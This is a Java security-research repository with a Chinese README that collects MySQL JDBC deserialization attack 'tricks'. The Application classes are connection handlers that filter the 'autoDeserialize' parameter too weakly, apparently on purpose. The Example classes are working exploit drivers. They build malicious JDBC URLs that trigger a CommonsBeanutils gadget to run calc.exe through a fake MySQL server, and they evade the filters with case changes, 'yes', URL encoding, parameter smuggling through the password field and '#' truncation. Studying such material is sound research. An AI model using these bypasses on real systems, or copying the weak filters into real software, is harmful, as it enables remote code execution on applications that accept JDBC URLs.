[
{
"path": ".gitignore",
"content": "target/\n!.mvn/wrapper/maven-wrapper.jar\n!**/src/main/**/target/\n!**/src/test/**/target/\n\n### IntelliJ IDEA ###\n.idea/modules.xml\n.idea/jarRepositories.xml\n.idea/compiler.xml\n.idea/libraries/\n*.iws\n*.iml\n*.ipr\n\n### Eclipse ###\n.apt_generated\n.classpath\n.factorypath\n.project\n.settings\n.springBeans\n.sts4-cache\n\n### NetBeans ###\n/nbproject/private/\n/nbbuild/\n/dist/\n/nbdist/\n/.nb-gradle/\nbuild/\n!**/src/main/**/build/\n!**/src/test/**/build/\n\n### VS Code ###\n.vscode/\n\n### Mac OS ###\n.DS_Store\n\n.idea/"
},
{
"path": "README.md",
"content": "## mysql-jdbc-tricks\n\n这里是很多`MySQL JDBC Attack`的小技巧,我仅在`MySQL`的`JDBC`驱动中测试,这里的技巧可能在其他类型的数据库驱动中也存在\n\n文章:https://mp.weixin.qq.com/s/lmoWKK41ZQzZOh-P26VUng\n\n推荐搭建:推荐配合 https://github.com/4ra1n/mysql-fake-server 使用\n\n### 基本示例\n\n参考`Application1`和`Example1`代码\n\n这是一个不存在任何过滤的情况,直接执行即可`RCE`\n\n### 大小写绕过\n\n参考`Application1`和`Example1`代码\n\n这里展示了一种简单的防护和绕过,`MySQL`驱动对于连接参数的大小不做限制,如果开发者不做大小写限制,将会被轻易饶过\n\n### YES绕过\n\n参考`Application3`和`Example3`代码\n\n这里展示了一种简单的防护和绕过,`MySQL`驱动允许的`Bool`值是包含`true/yes`两种的,因此存在一种绕过\n\n### 编码绕过\n\n参考`Application4`和`Example4`代码\n\n这里展示了某些情况下的绕过,`MySQL`驱动允许`URL`编码,因此如果开发者没有按照标准`URL`解析和过滤,将会存在绕过\n\n### 暂时的安全\n\n参考`Application5`和`Example5`代码\n\n对于这种情况,似乎是安全了,或许有其他的绕过?\n\n### 另一种形式的传参\n\n参考`Application6`和`Example6`代码\n\n这也是`JDBC`攻击很常见的一种情况\n\n### 额外参数检查绕过\n\n参考`Application7`和`Example7Bypass`代码\n\n限制额外连接参数情况下如何绕过\n\n### 特殊情况下的#号绕过\n\n参考`Application8`和`Example8Bypass`代码\n\n一种特殊情况的绕过,属于一种逻辑漏洞\n\n### 另一种特殊场景的绕过\n\n参考`Application9`和`Example9Bypass`代码\n\n另一种特殊情况的绕过,开发者忽略某些参数过滤导致的绕过\n\n### 可能安全\n\n参考`Application10`和`Example10`代码\n\n对于这种情况,似乎是安全了,或许有其他的绕过?\n"
},
{
"path": "pom.xml",
"content": "\n\n 4.0.0\n\n org.y4sec\n mysql-jdbc-tricks\n 1.0\n\n \n 8\n 8\n UTF-8\n \n\n \n \n mysql\n mysql-connector-java\n 6.0.2\n \n \n commons-beanutils\n commons-beanutils\n 1.9.4\n \n \n\n"
},
{
"path": "src/main/java/org/y4sec/team/app/Application1.java",
"content": "package org.y4sec.team.app;\n\nimport java.sql.DriverManager;\n\npublic class Application1 {\n public static void connection(String url){\n try {\n Class.forName(\"com.mysql.cj.jdbc.Driver\");\n DriverManager.getConnection(url);\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/app/Application10.java",
"content": "package org.y4sec.team.app;\n\nimport java.sql.DriverManager;\n\npublic class Application10 {\n public static void connection(String addr, String user, String db, String password, String extra) {\n try {\n String url = String.format(\"jdbc:mysql://%s/%s?\", addr, db);\n\n StringBuilder sb = new StringBuilder();\n sb.append(\"user=\");\n sb.append(check(user));\n sb.append(\"&\");\n sb.append(\"password=\");\n sb.append(check(password));\n\n if (!extra.equals(\"\")) {\n sb.append(\"&\");\n sb.append(check(extra));\n }\n\n url = url + sb;\n\n check(url);\n\n System.out.println(url);\n\n Class.forName(\"com.mysql.cj.jdbc.Driver\");\n DriverManager.getConnection(url);\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n\n private static String check(String params) {\n if (params.contains(\"autoDeserialize\")) {\n throw new RuntimeException(\"you are hacker\");\n }\n return params;\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/app/Application2.java",
"content": "package org.y4sec.team.app;\n\nimport java.net.URI;\nimport java.sql.DriverManager;\nimport java.util.HashMap;\nimport java.util.Map;\n\npublic class Application2 {\n public static void connection(String url){\n try {\n if(!check(url)) {\n System.out.println(\"you are hacker\");\n return;\n }\n Class.forName(\"com.mysql.cj.jdbc.Driver\");\n DriverManager.getConnection(url);\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n\n private static boolean check(String jdbcUrl){\n try {\n Map params = new HashMap<>();\n String query = jdbcUrl.split(\"\\\\?\")[1];\n if (query != null) {\n String[] pairs = query.split(\"&\");\n for (String pair : pairs) {\n String[] keyValue = pair.split(\"=\");\n String key = keyValue[0];\n String value = keyValue.length > 1 ? keyValue[1] : \"\";\n params.put(key, value);\n }\n }\n\n System.out.println(\"Params: \" + params);\n\n for (Map.Entry p: params.entrySet()){\n if (p.getKey().equals(\"autoDeserialize\")) {\n if(p.getValue().equals(\"true\")){\n return false;\n }\n }\n }\n\n return true;\n } catch (Exception e) {\n e.printStackTrace();\n return false;\n }\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/app/Application3.java",
"content": "package org.y4sec.team.app;\n\nimport java.net.URI;\nimport java.sql.DriverManager;\nimport java.util.HashMap;\nimport java.util.Map;\n\npublic class Application3 {\n public static void connection(String url){\n try {\n if(!check(url)) {\n System.out.println(\"you are hacker\");\n return;\n }\n Class.forName(\"com.mysql.cj.jdbc.Driver\");\n DriverManager.getConnection(url);\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n\n private static boolean check(String jdbcUrl){\n try {\n Map params = new HashMap<>();\n String query = jdbcUrl.split(\"\\\\?\")[1];\n if (query != null) {\n String[] pairs = query.split(\"&\");\n for (String pair : pairs) {\n String[] keyValue = pair.split(\"=\");\n String key = keyValue[0];\n String value = keyValue.length > 1 ? keyValue[1] : \"\";\n params.put(key, value);\n }\n }\n\n System.out.println(\"Params: \" + params);\n\n for (Map.Entry p: params.entrySet()){\n if (p.getKey().equals(\"autoDeserialize\")) {\n String value = p.getValue();\n value = value.toLowerCase();\n if(value.equals(\"true\")){\n return false;\n }\n }\n }\n\n return true;\n } catch (Exception e) {\n e.printStackTrace();\n return false;\n }\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/app/Application4.java",
"content": "package org.y4sec.team.app;\n\nimport java.net.URI;\nimport java.sql.DriverManager;\nimport java.util.HashMap;\nimport java.util.Map;\n\npublic class Application4 {\n public static void connection(String url) {\n try {\n if (!check(url)) {\n System.out.println(\"you are hacker\");\n return;\n }\n Class.forName(\"com.mysql.cj.jdbc.Driver\");\n DriverManager.getConnection(url);\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n\n private static boolean check(String jdbcUrl) {\n try {\n Map params = new HashMap<>();\n String query = jdbcUrl.split(\"\\\\?\")[1];\n if (query != null) {\n String[] pairs = query.split(\"&\");\n for (String pair : pairs) {\n String[] keyValue = pair.split(\"=\");\n String key = keyValue[0];\n String value = keyValue.length > 1 ? keyValue[1] : \"\";\n params.put(key, value);\n }\n }\n\n System.out.println(\"Params: \" + params);\n\n for (Map.Entry p : params.entrySet()) {\n if (p.getKey().equals(\"autoDeserialize\")) {\n String value = p.getValue();\n value = value.toLowerCase();\n if (value.equals(\"true\") || value.equals(\"yes\")) {\n return false;\n }\n }\n }\n\n return true;\n } catch (Exception e) {\n e.printStackTrace();\n return false;\n }\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/app/Application5.java",
"content": "package org.y4sec.team.app;\n\nimport java.net.URI;\nimport java.sql.DriverManager;\nimport java.util.HashMap;\nimport java.util.Map;\n\npublic class Application5 {\n public static void connection(String url) {\n try {\n if (!check(url)) {\n System.out.println(\"you are hacker\");\n return;\n }\n Class.forName(\"com.mysql.cj.jdbc.Driver\");\n DriverManager.getConnection(url);\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n\n private static boolean check(String jdbcUrl) {\n try {\n URI uri = new URI(jdbcUrl.replace(\"jdbc:\", \"\"));\n\n String host = uri.getHost();\n int port = uri.getPort();\n String path = uri.getPath();\n String dbname = path.substring(1);\n\n Map params = new HashMap<>();\n String query = uri.getQuery();\n if (query != null) {\n String[] pairs = query.split(\"&\");\n for (String pair : pairs) {\n String[] keyValue = pair.split(\"=\");\n String key = keyValue[0];\n String value = keyValue.length > 1 ? keyValue[1] : \"\";\n params.put(key, value);\n }\n }\n\n System.out.println(\"Host: \" + host);\n System.out.println(\"Port: \" + port);\n System.out.println(\"DB Name: \" + dbname);\n System.out.println(\"Params: \" + params);\n\n for (Map.Entry p : params.entrySet()) {\n if (p.getKey().equals(\"autoDeserialize\")) {\n String value = p.getValue();\n value = value.toLowerCase();\n if (value.equals(\"true\") || value.equals(\"yes\")) {\n return false;\n }\n }\n }\n\n return true;\n } catch (Exception e) {\n e.printStackTrace();\n return false;\n }\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/app/Application6.java",
"content": "package org.y4sec.team.app;\n\nimport java.net.URLDecoder;\nimport java.sql.DriverManager;\n\npublic class Application6 {\n public static void connection(String addr,String user,String db,String password,String extra) {\n try {\n String url = String.format(\"jdbc:mysql://%s/%s?\",addr,db);\n\n StringBuilder sb = new StringBuilder();\n sb.append(\"user=\");\n sb.append(user);\n sb.append(\"&\");\n sb.append(\"password=\");\n sb.append(password);\n if (!extra.equals(\"\")){\n sb.append(\"&\");\n sb.append(extra);\n }\n\n url = url + sb;\n\n Class.forName(\"com.mysql.cj.jdbc.Driver\");\n DriverManager.getConnection(url);\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/app/Application7.java",
"content": "package org.y4sec.team.app;\n\nimport java.sql.DriverManager;\nimport java.util.HashMap;\nimport java.util.Map;\n\npublic class Application7 {\n public static void connection(String addr,String user,String db,String password,String extra) {\n try {\n String url = String.format(\"jdbc:mysql://%s/%s?\",addr,db);\n\n StringBuilder sb = new StringBuilder();\n sb.append(\"user=\");\n sb.append(user);\n sb.append(\"&\");\n sb.append(\"password=\");\n sb.append(password);\n\n if (!check(extra)){\n System.out.println(\"you are hacker\");\n return;\n }\n\n if (!extra.equals(\"\")){\n sb.append(\"&\");\n sb.append(extra);\n }\n\n url = url + sb;\n\n System.out.println(url);\n\n Class.forName(\"com.mysql.cj.jdbc.Driver\");\n DriverManager.getConnection(url);\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n\n private static boolean check(String params){\n try {\n return !params.contains(\"autoDeserialize\");\n } catch (Exception e) {\n e.printStackTrace();\n return false;\n }\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/app/Application8.java",
"content": "package org.y4sec.team.app;\n\nimport java.sql.DriverManager;\n\npublic class Application8 {\n public static void connection(String addr, String user, String db, String password, String extra) {\n try {\n String url = String.format(\"jdbc:mysql://%s/%s?\", addr, db);\n\n StringBuilder sb = new StringBuilder();\n sb.append(\"user=\");\n sb.append(user);\n sb.append(\"&\");\n sb.append(\"password=\");\n sb.append(password);\n\n if (!check(extra)) {\n System.out.println(\"you are hacker\");\n return;\n }\n\n if (!extra.equals(\"\")) {\n sb.append(\"&\");\n sb.append(extra);\n }\n\n if (url.endsWith(\"?\")) {\n url = url + sb + \"autoDeserialize=false\";\n } else {\n url = url + sb + \"&autoDeserialize=false\";\n }\n\n System.out.println(url);\n\n Class.forName(\"com.mysql.cj.jdbc.Driver\");\n DriverManager.getConnection(url);\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n\n private static boolean check(String params) {\n try {\n return !params.contains(\"autoDeserialize\");\n } catch (Exception e) {\n e.printStackTrace();\n return false;\n }\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/app/Application9.java",
"content": "package org.y4sec.team.app;\n\nimport java.sql.DriverManager;\n\npublic class Application9 {\n public static void connection(String addr, String user, String db, String password, String extra) {\n try {\n String url = String.format(\"jdbc:mysql://%s/%s?\", addr, db);\n\n StringBuilder sb = new StringBuilder();\n sb.append(\"user=\");\n sb.append(check(user));\n sb.append(\"&\");\n sb.append(\"password=\");\n sb.append(check(password));\n\n if (!extra.equals(\"\")) {\n sb.append(\"&\");\n sb.append(check(extra));\n }\n\n url = url + sb;\n\n System.out.println(url);\n\n Class.forName(\"com.mysql.cj.jdbc.Driver\");\n DriverManager.getConnection(url);\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n\n private static String check(String params) {\n if (params.contains(\"autoDeserialize\")) {\n throw new RuntimeException(\"you are hacker\");\n }\n return params;\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example1.java",
"content": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application1;\n\npublic class Example1 {\n public static void main(String[] args) {\n String addr = \"127.0.0.1:62787\";\n String params = \"detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe\";\n String url = String.format( \"jdbc:mysql://%s/test?%s\",addr,params);\n\n Application1.connection(url);\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example10.java",
"content": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application10;\n\npublic class Example10 {\n public static void main(String[] args) {\n // 可控内容\n String addr = \"127.0.0.1:62787/test?detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe&#\";\n String user = \"deser_CB_calc.exe\";\n String password = \"test\";\n String db = \"test\";\n String extra = \"\";\n\n Application10.connection(addr,user,db,password,extra);\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example2.java",
"content": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application2;\n\npublic class Example2 {\n public static void main(String[] args) {\n String addr = \"127.0.0.1:62787\";\n String params = \"detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe\";\n String url = String.format(\"jdbc:mysql://%s/test?%s\", addr, params);\n\n Application2.connection(url);\n\n addr = \"127.0.0.1:62787\";\n params = \"detectCustomCollations=true&autoDeserialize=tRue&user=deser_CB_calc.exe\";\n url = String.format(\"jdbc:mysql://%s/test?%s\", addr, params);\n\n Application2.connection(url);\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example3.java",
"content": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application3;\n\npublic class Example3 {\n public static void main(String[] args) {\n String addr = \"127.0.0.1:62787\";\n String params = \"detectCustomCollations=true&autoDeserialize=tRue&user=deser_CB_calc.exe\";\n String url = String.format(\"jdbc:mysql://%s/test?%s\", addr, params);\n\n Application3.connection(url);\n\n addr = \"127.0.0.1:62787\";\n params = \"detectCustomCollations=true&autoDeserialize=yes&user=deser_CB_calc.exe\";\n url = String.format(\"jdbc:mysql://%s/test?%s\", addr, params);\n\n Application3.connection(url);\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example4.java",
"content": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application4;\n\npublic class Example4 {\n public static void main(String[] args) {\n String addr = \"127.0.0.1:62787\";\n String params = \"detectCustomCollations=true&autoDeserialize=yes&user=deser_CB_calc.exe\";\n String url = String.format(\"jdbc:mysql://%s/test?%s\", addr, params);\n\n Application4.connection(url);\n\n addr = \"127.0.0.1:62787\";\n params = \"detectCustomCollations=true&autoDeserialize=%74%72%75%65&user=deser_CB_calc.exe\";\n url = String.format(\"jdbc:mysql://%s/test?%s\", addr, params);\n\n Application4.connection(url);\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example5.java",
"content": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application5;\n\npublic class Example5 {\n public static void main(String[] args) {\n String addr = \"127.0.0.1:62787\";\n String params = \"detectCustomCollations=true&autoDeserialize=%74%72%75%65&user=deser_CB_calc.exe\";\n String url = String.format(\"jdbc:mysql://%s/test?%s\", addr, params);\n\n Application5.connection(url);\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example6.java",
"content": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application6;\n\npublic class Example6 {\n public static void main(String[] args) {\n // 可控内容\n String addr = \"127.0.0.1:62787\";\n String user = \"deser_CB_calc.exe\";\n String password = \"test\";\n String db = \"test\";\n String extra = \"detectCustomCollations=true&autoDeserialize=true\";\n\n Application6.connection(addr,user,db,password,extra);\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example7.java",
"content": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application7;\n\npublic class Example7 {\n public static void main(String[] args) {\n // 可控内容\n String addr = \"127.0.0.1:62787\";\n String user = \"deser_CB_calc.exe\";\n String password = \"test\";\n String db = \"test\";\n String extra = \"detectCustomCollations=true&autoDeserialize=true\";\n\n Application7.connection(addr,user,db,password,extra);\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example7Bypass.java",
"content": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application7;\n\npublic class Example7Bypass {\n public static void main(String[] args) {\n // 可控内容\n String addr = \"127.0.0.1:62787\";\n String user = \"deser_CB_calc.exe\";\n String password = \"test&autoDeserialize=true&\";\n String db = \"test\";\n String extra = \"detectCustomCollations=true&\";\n\n Application7.connection(addr,user,db,password,extra);\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example8.java",
"content": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application8;\n\npublic class Example8 {\n public static void main(String[] args) {\n // 可控内容\n String addr = \"127.0.0.1:62787\";\n String user = \"deser_CB_calc.exe\";\n String password = \"test&autoDeserialize=true&\";\n String db = \"test\";\n String extra = \"detectCustomCollations=true&\";\n\n Application8.connection(addr,user,db,password,extra);\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example8Bypass.java",
"content": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application8;\n\npublic class Example8Bypass {\n public static void main(String[] args) {\n // 可控内容\n String addr = \"127.0.0.1:62787\";\n String user = \"deser_CB_calc.exe\";\n String password = \"test&autoDeserialize=true\";\n String db = \"test\";\n String extra = \"detectCustomCollations=true&#?\";\n\n Application8.connection(addr,user,db,password,extra);\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example9.java",
"content": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application9;\n\npublic class Example9 {\n public static void main(String[] args) {\n // 可控内容\n String addr = \"127.0.0.1:62787\";\n String user = \"deser_CB_calc.exe\";\n String password = \"test&autoDeserialize=true&\";\n String db = \"test\";\n String extra = \"detectCustomCollations=true&\";\n\n Application9.connection(addr,user,db,password,extra);\n }\n}\n"
},
{
"path": "src/main/java/org/y4sec/team/exploit/Example9Bypass.java",
"content": "package org.y4sec.team.exploit;\n\nimport org.y4sec.team.app.Application9;\n\npublic class Example9Bypass {\n public static void main(String[] args) {\n // 可控内容\n String addr = \"127.0.0.1:62787/test?detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe&#\";\n String user = \"deser_CB_calc.exe\";\n String password = \"test\";\n String db = \"test\";\n String extra = \"\";\n\n Application9.connection(addr,user,db,password,extra);\n }\n}\n"
}
]